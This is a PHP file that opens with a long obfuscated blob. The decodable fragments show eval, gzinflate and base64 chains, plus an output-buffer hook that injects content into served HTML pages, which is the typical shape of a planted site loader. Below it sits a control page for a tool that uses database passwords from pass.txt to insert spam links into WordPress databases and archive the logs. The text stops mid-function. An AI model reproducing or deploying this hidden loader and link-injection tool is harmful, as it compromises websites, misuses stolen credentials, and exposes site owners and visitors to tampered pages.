ZORm5hc1ZXZXZwMFp0aGpXbkJIUFoxMU1KcFZYOEZsU014RFJXQjFKdUlUTnlaR0p1SXlKaTRTTjFJblprNHlKdWt5SnVJeUppNHlKQVozVk9GbmRYNUVlTnQxWnprRmNtNW1hV0ZsYjBvRVQ0MTBXbk5UV3daV2M2eFhUNDEwV25OVFd3Wm1ibVprVDR4aldrTlRVd1ZHTmRWeld2VjFXYzlXVDJ3bGF6Y0VUbjRpTTFJblprNHlKbjRpSW5JaUwxVWpjbVJpTG40U0tpQWtkWDVVYzJkbFQ5cG5SUVozTndaR05WdFZYOFZsUk94WFYyWUdiWlpqWjR4a1ZQeFdXMWNHYkV4V1o4bDFTbjlXVDIwa2RteFdaOGwxU245V1RMMVVjcXhXWjU5bVNuMUdPYWRHYzhrVlh6a2tXZHhYVUt4RVBFeEdVbjRpTTFJblprNHlKaWNpTDFVamNtUmlMbjBUTXBOSGNrc1RLaWNpTHlVVGF5WkdKdWNTTjN3Vk0xZ0hYMlFUTWNkek00eDFNMUVEWHpVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjJFRFg1WURlY0ZUTXh3Vk8yZ0hYM1FUTWNOVE40eGxNekVEWGlaRGVjRnpOY2RETjR4bE0wRURYM2NEZWNGak5jZFRONHhWTTBFRFhtWkRlY1ZqTXh3MU4wZ0hYeU1UTWNaek40eGxOeEVEWDNVRGVjSnpNeHdsWTJnSFh4Y0RYMlFEZWNaVE14d2xNemdIWDFJVE1jSnpNNHgxTTBFRFg0WURlY0pUTXh3MU4wZ0hYeEVUTWNWek40eGxNeEVEWDRVRGVjUkROeHdGTXpnSFgySVRNY1JtTjR4MU0wRURYM01EZWNOVE54d1ZPMmdIWHlRVE1jWnpONHhsTXlFRFg0VURlY0ZETnh3VlkyZ0hYMVlEWDNVRGVjUkROeHdGWjJnSFh5SVRNY05ETjR4Vk14RURYemNEZWNSak5jUm1ONHgxTTBFRFh4TURlY0pqTXh3Rk8xZ0hYeU1UTWNsek40eGxNeUVEWHpRRGVjTlRNeHdsTTNnSFh3Y1RNY2RUTjR4Vk16RURYek1EZWNGek5jWlRONHhWTjBFRFg0WURlY0pUTXh3VloyZ0hYelFUTWNoak40eEZOMkVEWDBVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjBFRFh6UURlY1JETnh3Rk0zZ0hYd2NUTWNkRE40eDFNMEVEWGhkRGVjRnpOY05tTjR4MU0wRURYd01EZWNaVE14d0ZPMGdIWHhFVE1jbHpNNHhWTXdFRFg1WURlY0pETnh3Vk8zZ0hYMklUTWNkaUwxSVRheVpHSnVjeU56Z0hYelVUTWNsak40eFZNeEVEWDNNRGVjTlROeHdWTzNnSFgxRVRNY1J6TjR4MU0xRURYNVlEZWNKRE54d2xOM2dIWDBVVE1jZERONHhGTjBFRFhoWkRlY1ZqTmNkVE40eEZOMEVEWGtaRGVjSlRNeHdWTzJnSFgwRVRNY2xqTjR4Vk15RURYelFEZWNOVE14d2xZMmdIWHlFVE1jTnpNNHhsTTBFRFhtWkRlY0ZUTXh3Rk8wZ0hYeFFUTWNGbU40eGxNd0VEWHpVRGVjQmpNeHcxTjJnSFgwWURYeU1EZWNKRE54d0ZNM2dIWHlJVE1jTnpNNHhWTXpFRFgxY0RlY1pqTXh3VloyZ0hYeU1UTWNsak40eEZOMndWTzJnSFh4RVRNY0ptTjR4Vk14RURYelFEZWNSVE14d1ZPMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY2xqTjR4Rk4yd1ZPMmdIWHhFVE1jSm1ONHhWTXpFRFg1WURlY0ZUTXh3bFoyZ0hYMFlEWHlNRGVjSkROeHdGTTNnSFh5SVRNY056TTR4Vk16RURYMWNEZWNaak14d1ZaMmdIWHlNVE1jWmpONHhsTnlFRFgzUURlY1JETnh3Rk8yZ0hYMklUTWNSbU40eDFNMEVEWGhaRGVjSkRNeHcxTTFnSFh3SVRNY2RqTjR4Rk4yd2xNemdIWHlRVE1jQnpNNHhGTjFFRFh5TURlY0Z6TXh3Vk4zZ0hYMklUTWNWbU40eGxNekVEWGlaRGVjTmpOeHdGTzBnSFh4RVRNY0J6TjR4Rk4yd0ZaMmdIWHpRVE1jRnpNNHhsTXlFRFg0VURlY0p6TXh3Vk8zZ0hYeUlUTWNORE40eDFNeEVEWDFjRGVjWmpNeHdWWjJnSFh6UVRNY0J6TTR4bE55RURYa1pEZWNORE54dzFOMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY0ppTG40U055SW5aazR5SnpZVE1jRjJONHhsTXhFRFgxY0RlY1pqTXh3VloyZ0hYelFUTWNCek00eGxOeUVEWGtaRGVjTkROeHdWWjJnSFh3WURYaFpEZWNKRE54d1ZNemdIWHlFVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMblV6TmNkek40eDFOeEVEWGxaRGVjUmpOY0p6TTR4bE0wRURYd2NEZWNKak14dzFNemdIWHhNVE1jVnpONHhsTnlFRFhsWkRlY0p6TXh3bE4yZ0hYMklUTWNkRE40eEZOMEVEWDRZRGVjWmpNeHdGWjJnSFh6UVRNY0ZtTjR4Rk4wRURYelVEZWNCak14d1ZOM2dIWDJJVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMbk1qTnh3VlkzZ0hYeUVUTWNObU40eGxOeEVEWDNVRGVjRnpNeHcxTTNnSFh5QVRNY2hUTjR4bE16RURYNWNEZWNGek5jRnpNNHhsTXpFRFhqWkRlY0pUTXh3Rk8wZ0hYelFUTWNWbU40eEZNMndWWTJnSFh5UVRNY2x6TjR4bE53RURYM1FEZWNSRE54dzFZMmdIWHlFVE1jaERONHhsTXhFRFhpNGlNMVFYYW1SQ0x5VWpacFpHSnNVak1tbG1aa2dTWmpGR2J3Vm1jZmRXWnlCM09pSWpNNHhGTTF3Vk4yZ0hYMFFUTWNabU40eDFNMEVEWDFZRGVjUkROeHdsWjFnSFgwWURYMk1EZWNWRE54dzFNM2dIWHhRVE1jSmpONHhGTTF3MVkyZ0hYeFFUTWNaek40eFZOMEVEWHdRRGVjSkNJOUFpTTFRWGFtUnlPaUkyTTR4Vk0xd2xNeWdIWHhZRFhqVkRlY0pETmNoak00eEZOMUVEWHhZRGVjWmpOeHdWTjJnSFhpQVNQZ0lUTm1sbVprc2pJMVFUTWNsak40eEZNd0VEWDVJRGVjTlROY1ZtTTR4Rk0xd0ZNMGdIWGlBU1BnVWpNbWxtWmtjQ0tzRm1kbHRqSXdJRGVjVnpOY0JqTTR4Rk0yd0ZOMmdIWDBRVE1jUmpNNHhsSWcwREkxSVRheVJHSmdzVE4xa21jbVJpTG5raUluNGlNMWttY21SQ0k5QVNOeUluWmtBeU9uZ0RONHhGTjBFRFhqWkRlY0pUTXh3Rk8wZ0hYeUVUTWNkQ0k5QVNOeWttY21SeU9uSTJNNHhWTTF3Vk95Z0hYeVFEWGtORGVjZENJOUFpTTFrbWNtUnlPblFEVjJZV2ZWdFVUbkFTUGdJVE55WkdKN2NDS3VWbmMwVm1ja2NDSTlBU04xSW5aa3N6SnlVRGRwWkdKc0lUTm1sbVprd1NOeVlXYW1SQ0t1SlhZMFZtY2tzekpnMERJMVVUYXlaR0orYVdZZ0tDRnBjM05sZENna1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVEtTa2dlMloxYm1OMGFXOXVJR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KSE1wZXlSbElEMGdJaUk3SUdadmNpQW9KR0VnUFNBd095QWtZU0E4UFNCemRISnNaVzRvSkhNcExURTdJQ1JoS3lzZ0tYc2taU0F1UFNBa2MzdHpkSEpzWlc0b0pITXBMU1JoTFRGOU8zMXlaWFIxY200b0pHVXBPMzFsZG1Gc0tHVjJZV3hzZDJoV1prbFdibGRRWWxRb0p6c3BLU0k5UVZObU4ydDVZVTVTYldKQ1VsaFhkazV1VW1wR1ZWZEtlRmRaTWxaSFNtOVZSMXAyVGxkYWF6bEdUakpWTW1Ob1NrZEpkVXBZWkRCV2JXTTNRbE5MY2pGRlduVkdSV1JhT1RKalIwNVhVVnBzUldKb1dsaGFhMmRwVWxSS2ExcFFiREJhYUZKR1lsQkNSbUZQTVVWaWFGcFlXbWMwTW1Kd1VqTlpkVlp1V2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNU1FVlRhMmh0VlhwTmJVbHZXVEJWUTFveVZFcGtWMWxWZURKVVVXaHRWRTU0VjFreVZsZFFXRTVHV201T1JWcFdiRlpoUms1V1ltaDRWMWt5VmtkS0lpaGxaRzlqWldSZk5EWmxjMkZpS0d4aGRtVW5LU2s3WlhaaGJDaGxkbUZzYkhkb1ZtWkpWbTVYVUdKVUtDYzdLU2tpTjJ0cFNUa3dWRkZxUW1wVlNVWnRTVzlaTUZWRFdqSlVTbVJYV1ZWNE1sUlJhRzFVVG5oWFdUSldWMUJZV2xaamFGcHNZM0JXTWxaVmVGZFpNbFpIU2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNVVYcFdhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3d4YWxGdGFFWlNWbVJGWkdsV1JscERlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdTVk5RT1VWV1V6SlNNbFpLU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRGVVdsWndibEoxVmpKUmMwb3laRko0VjFreVZrZEtJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVXSEJKVTFZeFZXeFZTVnBGVFZsT2JGWjNWV3hXTlZsVlZsWktiRkpVU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkhSc1ZVWmFiRlZHVGpGWWF6QjZVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLSWlobFpHOWpaV1JmTkRabGMyRmlLR3hoZG1VbktTazdaWFpoYkNobGRtRnNiSGRvVm1aSlZtNVhVR0pVS0NjN0tTa2lQWE5VUzNCcmFXTnhUbXhXYWtZd1lXaFNSMWRhVWxoTmFGcFlXbXRuYVdSc1NtNWpNRTVJUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hvUTJKb1dsaGFJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVTM0JKVTFBNVl6SlpjMmhZWWxwU2JsSjBWbXhKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU1hOcmFVa3dXVEZTWVZadVVsaGtiRWx2V1RCVlExb3lWRXBrVjFsVmVESlVVV2h0VkU1NFYxa3lWa2RKYzJ0cFNUbHJSVmRoU2tSaVNFWnRZVXRvVmxkdFdqQldhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hDUTB4d1NVTk5OVEJYVlZBMWExWlZTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRUpEVEhCSlUxQkNOVEpaZUdkdVRWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNRa05NY0VsRFlqUkthbGN5YkdwTlUwcERTMGRPYkZGdE9WVlRia1pIVm5NNVJWVnZOVlZVYzBadFpHeG9VMlZvU201amFFSlRVR2RSU0ZWRmFESmllbVJGWkhWU1JXUlZlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdhMmxKTlZGSVZreHdibFZFZEd0bFV6VnRXWE5LYkdKcFdtNVVlV2RHVFZkS2FsZHRXakZTYVVKdVYwaEdNVm93TURKWmVFbEdWMkZzU0dSSmJFVmpUbWhyVTNaU1ZHSlNNV3RVZVVsc1UzTkNSRlpoV2pCTmFIQnJVMVpTYkZKcldtdFpiM0JHVjJGa1IwNTVTVWRqVTA1VVZ6RmFiR0poU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkdoRFltaGFXRm9pS0dWa2IyTmxaRjgwTm1WellXSW9iR0YyWlNjcEtUdGxkbUZzS0dWMllXeHNkMmhXWmtsV2JsZFFZbFFvSnpzcEtTSTlQWGRQY0dkRFRXdFNSMHBuTUVSSldYQklVbmxvTVZSSlpESlRibmhYV1RKV1Iwb2lLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1R0bGRtRnNLR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KenNwS1NJOVBWRm1PWFJVV0hoelJtRnFSa1ZVWVhSSFZrTmFSbUl4UmpOYWVrNHpZM05HYldSc1VrTkpPVUZEWVdwR1JWUmhkRWRXUTFwR1lqRkdNMXA2VGpOamMwWnRaR3hTUTBrM2EwTmhha1pGVkdGMFIxWkRXa1ppTVVZelducE9NMk56Um0xa2JGSkRUR3hXYkdWSE5WZGFSSGh0V1ROR1JtSm9XbGhhYTJkVFdtczVSMkozYUZoYVp6QkVTVzlPVjFGTmNERmhWVXByVm5OV1dHTnVUak5qZW5oWFdUSldSMG8zYkZOTGJGWnNaVWMxVjFwRWVHMVpNMFpHWW1oYVdGcHJkME5oYWtaRlZHRjBSMVpEV2taaU1VWXpXbnBPTTJOelJtMWtiRkpEUzNsU00yTjVVak5qYjBGcFduQjBWRXR3TUZaTGFWVnNWSGhSVmxNMVdWVldWa3BzVWxSS1EwdEhUbXhSYlRsVlUyNUdSMVp6T1VWVmJ6VlZWSE5HYldSc2RHeFZSbHBzVlVaT01WaHJaMU5hYXpreVdYVldSMko1Vm01TWNFbFRUMjR4YlZOcFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdDVVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLYjFWSFduWk9iV0pzZUcxak1UVlRTMmxyVkZOMGNHdEpiMWt3VlVOYU1sUktaRmRaVlhneVZGRm9iVlJPZUZkWk1sWnRUR1JzYVVrNWEydFNVMVpyVW5kbmJGSlRSa1JXVDFveFlWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNkR3hWUmxwc1ZVWk9NVmhyTkZOTGFUQkVUVlZHYlVsdldUQlZRMW95VkVwa1YxbFZlREpVVVdodFZFNTRWMWt5Vm0xTWNFbFRVRFJSTUZscFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdHBTWFpLYTJKTlNrTkxSMDVzVVcwNVZWTnVSa2RXY3psRlZXODFWVlJ6Um0xa2JEVnBVVzFvUmxKV1pFVmthVlpHV2tONFYxa3lWa2RLZFd0cFNUa3dlbVJOU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRWRFZ6WlNhMk5aT1VWVGJuUXdXbk5HYldSc1VtbE1jRWxUVURSclNGUnBaMmxTVkVwcldsQnNNRnBvVWtaaVVFSkdZVTh4UldKb1dsaGFkV3RwU1Rrd2VscFFTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRFY1VmxkR1dGbFhTbGhoYkdSR1ZuTkdiV1JzVWtOTGRVcEZWR3BrVlZOS09WVlhlSFJYVTBNeFZWSlllRmRaTWxaSFNUbEJRMkZxUmtWVVlYUkhWa05hUm1JeFJqTmFlazR6WTNOR2JXUnNVa05KTjJ0RFRYZG5SRTE0YzFOTGIxVlhZbkJTU0V4d2EybEpPVEJGVTJ0b2JWVjZUVzFKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU3pGUlYySnpZekZWYTJReVVXdFdWbGR3VmpCVmRFWkhZbWhhV0ZwcloxTmFjSFF5WW5aT1IyUnNUa2hSWjNOSVNXeE9TR0pzUWxObU4wSlRTM0JyVTFoWVRrWmFiazVGV2xac1ZtRkdUbFppYUhoWFdUSldSMHBpVmxWVFREa3dWRVE1UmtwdlVWaGFlazVZWVc5QmFXTjJRbE5MY0UxcldtcGtWMVIzV2xoaGVqRnJZM05HYldSc1VrTkpjMGxUWVhaSlEwbDFRVk5MTUVKR1VtODVNbU5JVW01aVJWSklWbk5HYldSc1VrTkpjMGxEWm1sblUxcHJPVWRpZHpGWFlXYzBRMGxwT0dsSmIyY3lXVEJHVjJKbVpGZGFlVUpJUzI5WlYyRWlLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1Rza1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVElEMHhPRGM1TWp0OSI7JGV2YTF0WWxiYWtCY1ZTaXIgPSAiXHg2NVwxNDRceDZmXDE1NFx4NzBcMTcwXHg2NSI7JGV2YTF0WWxkYWtCY1ZTaXIgPSAiXHg3M1wxNjRceDcyXDE2Mlx4NjVcMTY2IjskZXZhMXRZbGRha0JvVlMxciA9ICJceDY1XDE0M1x4NjFcMTU0XHg3MFwxNDVceDcyXDEzN1x4NjdcMTQ1XHg3MlwxNjAiOyRldmExdFlpZG9rQm9WU2pyID0gIlx4M2JcNTFceDI5XDEzNVx4MzFcMTMzXHg3MlwxNTJceDUzXDEyNlx4NjNcMTAyXHg2YlwxNDFceDY0XDE1MVx4NTlcMTY0XHgzMVwxNDFceDc2XDE0NVx4MjRcNTBceDY1XDE0NFx4NmZcMTQzXHg2NVwxNDRceDVmXDY0XHgzNlwxNDVceDczXDE0MVx4NjJcNTBceDZjXDE0MVx4NzZcMTQ1XHg0MFw3Mlx4NjVcMTY2XHg2MVwxNTRceDI4XDQyXHg1Y1w2MVx4MjJcNTFceDNiXDcyXHg0MFw1MFx4MmVcNTNceDI5XDEwMFx4NjlcMTQ1IjskZXZhMXRZbGRva0JjVlNqcj0kZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZbGRha0JvVlMxcik7JGV2YTF0WWxkYWtCY1ZTanI9JGV2YTF0WWxkYWtCY1ZTaXIoJGV2YTF0WWxiYWtCY1ZTaXIpOyRldmExdFlpZGFrQmNWU2pyID0gJGV2YTF0WWxkYWtCY1ZTanIoY2hyKDI2ODcuNSowLjAxNiksICRldmExZllsYmFrQmNWU2lyKTskZXZhMXRZWGRha0FjVlNqciA9ICRldmExdFlpZGFrQmNWU2pyWzAuMDMxKjAuMDYxXTskZXZhMXRZaWRva0JjVlNqciA9ICRldmExdFlsZGFrQmNWU2pyKGNocigzNjI1KjAuMDE2KSwgJGV2YTF0WWlkb2tCb1ZTanIpOyRldmExdFlsZG9rQmNWU2pyKCRldmExdFlpZG9rQmNWU2pyWzAuMDE2Kig3ODEyLjUqMC4wMTYpXSwkZXZhMXRZaWRva0JjVlNqcls2Mi41KjAuMDE2XSwkZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZaWRva0JjVlNqclswLjA2MSowLjAzMV0pKTskZXZhMXRZbGRha0JjVlNpciA9ICIiOyRldmExdFlsZGFrQm9WUzFyID0gJGV2YTF0WWxiYWtCY1ZTaXIuJGV2YTF0WWxiYWtCY1ZTaXI7JGV2YTF0WWlkb2tCb1ZTanIgPSAkZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZbGRha0JjVlNpciA9ICJceDczXDE2NFx4NzJceDY1XDE0M1x4NzJcMTYwXDE2NFx4NzIiOyRldmExdFlsYmFrQmNWU2lyID0gIlx4NjdcMTQxXHg2ZlwxMzNceDcwXDE3MFx4NjUiOyRldmExdFlsZGFrQm9WUzFyID0gIlx4NjVcMTQzXHg3MlwxNjAiOyRldmExdFlsZGFrQmNWU2lyID0gIiI7JGV2YTF0WWxkYWtCb1ZTMXIgPSAkZXZhMXRZbGJha0JjVlNpci4kZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZaWRva0JvVlNqciA9ICRldmExdFlsYmFrQmNWU2lyO30gfSAgDQogDQogcmV0dXJuICRldmFsc3NzZ3F1bFZCVGtaTEFjaDsgICB9IH0NCiBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjdcMTcyXHg2NFwxNDVceDYzXDE1N1x4NjRcMTQ1IikpIHsNCiBmdW5jdGlvbiBnemRlY29kZSgkZXZhMWZZMmJvMDF6bzgxNykgeyAkZXZhMWZZMmJhbDFjejhpNCA9ICJceDczXDE2NFx4NzJcMTYwXHg2ZlwxNjMiOyAkZXZhMWZZMmJvbDFjejhpNSA9ICJceDczXDE2NVx4NjJcMTYzXHg3NFwxNjIiOyAkZXZhMWZZMmJvMTFjejhpNSA9ICJceDc1XDE1Nlx4NzBcMTQxXHg2M1wxNTMiOyAkZXZhMWZZMmJvMWxjejhpNSA9ICJceDYzXDE1MFx4NzIiOyAkZXZhMWZZMmJvMWx6YzhpNSA9ICJceDY3XDE3Mlx4NjlcMTU2XHg2NlwxNTRceDYxXDE2NFx4NjUiOw0KICRldmExZlkyYm8wMXpvMzE3PUBvcmQoQCRldmExZlkyYm9sMWN6OGk1KCRldmExZlkyYm8wMXpvODE3LDMsMSkpOw0KICRldmExZlkyYm8wMWMwMzE3PTEwOyAgaWYoJGV2YTFmWTJibzAxem8zMTcmNCkgew0KICRldmExZlkyYm8wMXowMzE3PUAkZXZhMWZZMmJvMTFjejhpNSgndicsJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsMTAsMikpOw0KICRldmExZlkyYm8wMXowMzE3PSRldmExZlkyYm8wMXowMzE3WzFdOw0KICRldmExZlkyYm8wMWMwMzE3Kz0yKyRldmExZlkyYm8wMXowMzE3Ow0KIH0gIGlmKCRldmExZlkyYm8wMXpvMzE3JjgpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMTYpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMikgew0KICRldmExZlkyYm8wMWMwMzE3Kz0yOw0KIH0gICRldmExZlkyYm8wMWMwM2E3PUAkZXZhMWZZMmJvMWx6YzhpNShAJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzAxYzAzMTcpKTsgIGlmKCRldmExZlkyYm8wMWMwM2E3PT09RkFMU0UpIHsNCiAkZXZhMWZZMmJvMDFjMDNhNz0kZXZhMWZZMmJvMDF6bzgxNzsNCiB9ICByZXR1cm4gJGV2YTFmWTJibzAxYzAzYTc7DQogfSB9DQogZnVuY3Rpb24gZXZhMWZZMmJhazFjVjJpcigkdmFyNikgeyAkZXZhMWZZMmIwMWx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNjJceDY1XDE2MFx4NmNcMTQxXHg2M1wxNDUiOyAkZXZhMWZZMmIwbGx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNTVceDYxXDE2NFx4NjNcMTUwIjsgJGV2YTFmWTJiMDIyemM4bDUgPSAiXHg0OFwxNDVceDYxXDE0NFx4NjVcMTYyIjsgJGV2YTFmWTJiMDIyem84bDUgPSAiXHg2N1wxNzJceDY0XDE0NVx4NjNcMTU3XHg2NFwxNDUiOyAkZXZhMWZZMmIwNTJ6bzhsNSA9ICJceDQzXDE1N1x4NmVcMTY0XHg2NVwxNTZceDc0XDU1XHg0NVwxNTZceDYzXDE1N1x4NjRcMTUxXHg2ZVwxNDdceDNhXDQwXHg2ZVwxNTdceDZlXDE0NSI7ICRldmExZlkyYjA1MnpvOGwxID0gIlx4MmZcMTM0XHgzY1wxMzRceDJmXDE0Mlx4NmZcMTQ0XHg3OVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYyem84bDEgPSAiXHgyZlw1MFx4NWNcNzRceDVjXDU3XHg2MlwxNTdceDY0XDE3MVx4NWJcMTM2XHg1Y1w3Nlx4NWRcNTJceDVjXDc2XHgyOVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYxem84bDEgPSAiXHgyZlwxMzRceDNjXDEzNFx4MmZcMTUwXHg3NFwxNTVceDZjXDU3XHg3M1wxNTEiOyAkZXZhMWZZMmJvNjF6bzhsMSA9ICJceDJmXDUwXHg1Y1w3NFx4NWNcNTdceDY4XDE2NFx4NmRcMTU0XHg1YlwxMzZceDVjXDc2XHg1ZFw1Mlx4NWNcNzZceDI5XDU3XHg3M1wxNTEiOyAkZXZhMWZZMmIwMjJ6YzhsNSgkZXZhMWZZMmIwNTJ6bzhsNSk7ICRldmExZlkyYm82MXpvOGw3PSRldmExZlkyYjAyMnpvOGw1KCR2YXI2KTsgIGlmKCRldmExZlkyYjBsbHpjOGw1KCRldmExZlkyYjA1MnpvOGwxLCRldmExZlkyYm82MXpvOGw3KSkgew0KIHJldHVybiAkZXZhMWZZMmIwMWx6YzhsNSgkZXZhMWZZMmIwNjJ6bzhsMSwgZXZhMWZZMmJhazFjVjBpcigpLiJcbiIuIlx4MjRcNjEiLCAkZXZhMWZZMmJvNjF6bzhsNywxKTsgfSBlbHNlIHsNCiBpZigkZXZhMWZZMmIwbGx6YzhsNSgkZXZhMWZZMmIwNjF6bzhsMSwkZXZhMWZZMmJvNjF6bzhsNykpIHsNCiByZXR1cm4gJGV2YTFmWTJiMDFsemM4bDUoJGV2YTFmWTJibzYxem84bDEsIGV2YTFmWTJiYWsxY1YwaXIoKS4iXG4iLiJceDI0XDYxIiwgJGV2YTFmWTJibzYxem84bDcsMSk7DQogfSBlbHNlIHsgcmV0dXJuICRldmExZlkyYm82MXpvOGw3OyB9DQogfSB9DQokZXZhMWZZMmJvNjF6bzgxNyA9ICJceDZmXDE0Mlx4NWZcMTYzXHg3NFwxNDFceDcyXDE2NCI7ICRldmExZlkyYm82MXpvODE3KCJceDY1XDE2Nlx4NjFcNjFceDY2XDEzMVx4MzJcMTQyXHg2MVwxNTNceDMxXDE0M1x4NTZcNjJceDY5XDE2MiIpOw0KCX0\x4e\103\x6e\60\x3d\42\x29\51\x3b\57\x2f"); ?><!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>automatical inserter links to wordpress database</title>
<script>
function hide() {
 var obj = document.getElementById("message");
 obj.style.display = "none";
}
setTimeout(hide, 5000);
</script>
</head>
<body>
<?php
DEFINE('DBG', 0); DEFINE('SEP', ' | '); DEFINE('BR', '<BR>'.PHP_EOL); DEFINE('NPOST', 4); DEFINE('LOG_EXT', '.log'); DEFINE('PROC_LOG', 'process'); DEFINE('CON_LOG', 'connect'); DEFINE('REV_LOG', 'reverse'); DEFINE('LIST_DB', 'pass.txt'); DEFINE('ARCH', $_SERVER['SERVER_NAME'].'.tar.gz'); ini_set("display_errors","1"); ini_set("display_startup_errors","1"); ini_set("memory_limit","1000M"); @set_time_limit ( 0 ); @ini_set ( 'max_execution_time', 0 ); $params = array(); $params['pswd'] = "pass"; $params['links'] = "links"; $logs = array(); $logs['connect'] = CON_LOG; $logs['process'] = PROC_LOG; $logs['reverse'] = REV_LOG; echo "<div id=\"message\">"; echo checkInstall($params, "txt"); echo checkInstall($logs, "log"); echo "</div>"; ?>
<h1>Actions</h1>
<form action="<?=$_SERVER['SCRIPT_NAME'] ?>">
 <input type="radio" name="flink" value="links_txt" >links.txt
 <input type="radio" name="flink" value="links1_txt">links1.txt
 <input type="hidden" name="a" value="post" />
 <input type="submit" value="post links">
</form>
 
<a href="?a=reverse">reverse posting</a><br />
 
<h2>Logs</h2>
<a href="?l=connect">connections.log</a><br />
<a href="?l=process"><?php echo(PROC_LOG) ?>.log</a><br />
<a href="?l=reverse">reverse.log</a><br />
<br />
<a href="?d=true">archive logs</a><br />
<div style="margin-top: 15px; clear: both; border-top: 1px dotted #999;">
<?php
 $flink = 'links.txt'; if(isset($_GET['flink'])){ if($_GET['flink'] == 'links_txt') { $flink = 'links.txt';} if($_GET['flink'] == 'links1_txt') { $flink = 'links1.txt';} } if (isset($_GET['l'])) { showLog($_GET['l']); } if (isset($_GET['d'])) { preDownloadLogs(); } if (isset($_GET['a'])) { if($_GET['a'] == 'post') { postLinks($flink); } if($_GET['a'] == 'reverse') { reverse_posting(); } } function postLinks($flink = 'links.txt') { $lch = fopen("connect.log", "w"); $num_of_bd = 0; $pswds = get_ar_file(LIST_DB); $links = get_ar_file($flink); if($pswds AND $links){ $num_of_bd = COUNT($pswds); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd); 